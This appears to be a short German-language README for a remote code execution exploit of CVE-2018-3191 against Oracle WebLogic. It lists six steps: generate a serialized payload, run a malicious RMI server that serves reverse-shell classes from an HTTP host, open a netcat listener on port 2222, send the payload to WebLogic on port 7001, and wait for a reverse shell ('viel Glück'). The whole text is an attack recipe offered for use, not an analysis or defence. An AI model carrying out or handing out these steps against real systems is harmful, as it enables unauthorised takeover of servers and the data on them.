CVE-2018-3191-Rce-Exploit
Autor: Break
Schritt 1: java -jar GenPayload.java output SJpayload.bin, Adresse ist die RMI-Server-Adresse
Schritt 2: java -jar RMISERVER.jar httpaddress, RMI-Server hört auf Port 1099 und lädt entfernte Reverse-Klassen auf den Webserver
Schritt 3: Legen Sie zwei Dateien (Reverse Shell) LoadObject.class und StreamConnection.class auf den HTTP-Server, sodass sie per URL aufgerufen werden können
Schritt 4: nc -llp 2222
Schritt 5: python weblogic.py weblogicAddress 7001 SJpayload
Schritt 6: Warten Sie auf eine Reverse Shell, viel Glück